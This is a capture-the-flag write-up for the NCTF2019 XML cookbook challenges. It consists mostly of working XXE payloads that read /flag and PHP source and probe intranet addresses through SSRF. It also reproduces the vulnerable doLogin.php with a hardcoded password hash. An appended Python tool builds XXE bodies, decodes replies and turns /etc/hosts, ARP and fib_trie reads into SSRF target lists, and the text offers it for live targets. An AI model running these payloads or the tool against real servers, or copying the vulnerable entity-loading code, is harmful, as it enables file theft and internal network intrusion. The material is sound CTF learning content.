NCTF2019/buuctf-WEB:Fake/True XML cookbook
Fake XML cookbook
Just switch the request to POST. Inject a malicious external entity that uses the file protocol and read the flag from the path the challenge hints at.
payload:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE username [
  <!ENTITY file SYSTEM "file:///flag">
]>
<user><username>&file;</username><password>456</password></user>
```
True XML cookbook
Same interface as the previous challenge, so I sent the payload from the previous challenge again:
According to the hint, it feels like the flag is in /var/www/html/doLogin.php... so read the source with XXE:
```xml
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php">
]>
<user><username>&file;</username><password>456</password></user>
```
The base64-decoded source of doLogin.php:
```php
<?php
/**
 * autor: c0ny1
 * date: 2018-2-7
 */
$USERNAME = 'admin'; // account
$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; // password
$result = null;

// Re-enables external entity loading; together with LIBXML_NOENT below this is the XXE root cause.
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');

try {
    $dom = new DOMDocument();
    // LIBXML_NOENT substitutes entities, LIBXML_DTDLOAD loads the DTD, so SYSTEM entities are fetched.
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $username = $creds->username;
    $password = $creds->password;
    if ($username == $USERNAME && $password == $PASSWORD) {
        $result = sprintf("<result><code>%d</code><msg>%s</msg></result>", 1, $username);
    } else {
        // The expanded entity comes back as the username, which is how file contents leak.
        $result = sprintf("<result><code>%d</code><msg>%s</msg></result>", 0, $username);
    }
} catch (Exception $e) {
    $result = sprintf("<result><code>%d</code><msg>%s</msg></result>", 3, $e->getMessage());
}

header('Content-Type: text/html; charset=utf-8');
echo $result;
?>
```
Hmm, nothing found there, but I'll still record the payload for reading source here.
I looked at other people's writeups, but it doesn't work for me...:
The only thing I can think of is using the XXE for SSRF against the intranet: first read a few files that reveal intranet IPs, /etc/hosts, /proc/net/arp and /proc/net/fib_trie, then probe the addresses found there.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://192.168.1.8">
]>
<user><username>&xxe;</username><password>123</password></user>
```
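The following is an added example, not code from the writeup or from the challenge: it builds the three kinds of payload used above (plain file:// read, base64-wrapped php://filter source read, and the http:// SSRF probe), decodes doLogin.php's `<result><msg>` reply, and turns the contents of /etc/hosts, /proc/net/arp and /proc/net/fib_trie into a list of intranet hosts worth probing. The base64 wrapping matters for the http:// case as well as for the PHP source: an HTML page or PHP file contains `<` and `&`, which would make the expanded entity ill-formed XML and end in the `code 3` error branch. The sample file contents and the sample server reply are constructed for this example; the 172.18.0.0/16 addresses in them are made up.

```python
from __future__ import annotations

import base64
import ipaddress
import re
import xml.etree.ElementTree as ET


def xxe_payload(system_id: str, password: str = "123") -> str:
    """Login body with one external entity; system_id is what the server-side parser
    fetches: file:///flag, a php://filter URL, or http://<intranet ip>/ for SSRF."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE foo [\n"
        f'  <!ENTITY xxe SYSTEM "{system_id}">\n'
        "]>\n"
        f"<user><username>&xxe;</username><password>{password}</password></user>\n"
    )


def php_filter_b64(resource: str) -> str:
    """Wrap a resource in php://filter so the entity expands to base64 text; raw PHP
    source or an HTML page contains '<' and '&' and would make the XML ill-formed."""
    return f"php://filter/read=convert.base64-encode/resource={resource}"


def decode_result_msg(response_xml: str) -> str:
    """Take <msg> out of doLogin.php's <result> document and base64-decode it."""
    msg = ET.fromstring(response_xml).findtext("msg") or ""
    return base64.b64decode(msg).decode("utf-8", "replace")


def _ipv4_hosts(candidates) -> list[str]:
    """Keep unique, non-loopback IPv4 addresses in first-seen order."""
    out: list[str] = []
    for c in candidates:
        try:
            ip = ipaddress.ip_address(c)
        except ValueError:
            continue
        if ip.version == 4 and not ip.is_loopback and c not in out:
            out.append(c)
    return out


def ips_from_etc_hosts(text: str) -> list[str]:
    """First column of /etc/hosts (a container usually lists its own address here)."""
    rows = (l for l in text.splitlines() if l.strip() and not l.lstrip().startswith("#"))
    return _ipv4_hosts(r.split()[0] for r in rows)


def ips_from_proc_arp(text: str) -> list[str]:
    """Neighbours the box has exchanged ARP with: first column, header row skipped."""
    return _ipv4_hosts(r.split()[0] for r in text.splitlines()[1:] if r.strip())


def parse_fib_trie(text: str) -> tuple[list[str], list[ipaddress.IPv4Network]]:
    """From /proc/net/fib_trie: the box's own addresses ('/32 host LOCAL' leaves) and its
    directly connected subnets ('/N link UNICAST' leaves), which bound the scan range."""
    lines, own, nets = text.splitlines(), [], []
    for i, line in enumerate(lines):
        m = re.match(r"\|-- (\S+)$", line.strip())
        if not m:
            continue
        addr, j = m.group(1), i + 1
        while j < len(lines) and lines[j].strip().startswith("/"):
            attr = lines[j].strip()  # e.g. "/32 host LOCAL", "/16 link UNICAST"
            if attr == "/32 host LOCAL":
                own.append(addr)
            elif attr.endswith("link UNICAST"):
                nets.append(ipaddress.ip_network(addr + attr.split()[0], strict=False))
            j += 1
    return _ipv4_hosts(own), nets


def ssrf_targets(hosts_txt: str, arp_txt: str, fib_txt: str) -> list[str]:
    """Intranet candidates: hosts seen in /etc/hosts and the ARP table, minus the box's
    own addresses, restricted to the subnets fib_trie says are directly reachable."""
    own, nets = parse_fib_trie(fib_txt)
    seen = ips_from_etc_hosts(hosts_txt) + ips_from_proc_arp(arp_txt)
    hits = {a for a in seen if a not in own and any(ipaddress.ip_address(a) in n for n in nets)}
    return sorted(hits, key=ipaddress.ip_address)


def ssrf_payloads(targets: list[str]) -> dict[str, str]:
    """One base64-wrapped http:// probe per candidate, as in the last payload above."""
    return {t: xxe_payload(php_filter_b64(f"http://{t}/")) for t in targets}


# Constructed sample data standing in for what the three XXE reads would return.
SAMPLE_HOSTS = "127.0.0.1\tlocalhost\n::1\tlocalhost ip6-localhost\n172.18.0.3\t3f2a9c1d7e5b\n"
SAMPLE_ARP = (
    "IP address       HW type     Flags       HW address            Mask     Device\n"
    "172.18.0.1       0x1         0x2         02:42:ac:12:00:01     *        eth0\n"
)
SAMPLE_FIB_TRIE = """Main:
  +-- 0.0.0.0/1 2 0 2
     +-- 127.0.0.0/8 2 0 2
        |-- 127.0.0.1
           /32 host LOCAL
     +-- 172.18.0.0/16 2 0 2
        +-- 172.18.0.0/30 2 0 2
           |-- 172.18.0.0
              /32 link BROADCAST
              /16 link UNICAST
           |-- 172.18.0.3
              /32 host LOCAL
"""
# Constructed doLogin.php reply to a base64 php://filter read of /etc/passwd.
SAMPLE_RESPONSE = ("<result><code>0</code><msg>"
                   + base64.b64encode(b"root:x:0:0:root:/root:/bin/bash\n").decode()
                   + "</msg></result>")

if __name__ == "__main__":
    print(xxe_payload(php_filter_b64("/var/www/html/doLogin.php")))
    print(decode_result_msg(SAMPLE_RESPONSE), end="")
    for ip in ssrf_targets(SAMPLE_HOSTS, SAMPLE_ARP, SAMPLE_FIB_TRIE):
        print("SSRF probe ->", ip)
```

Against a live target each body from `xxe_payload` goes in the POST body exactly as the payloads above do, and `decode_result_msg` is applied to the reply; the fib_trie parser only treats `/32 host LOCAL` leaves as the box's own addresses and `link UNICAST` leaves as connected subnets, so loopback and broadcast entries never end up in the probe list.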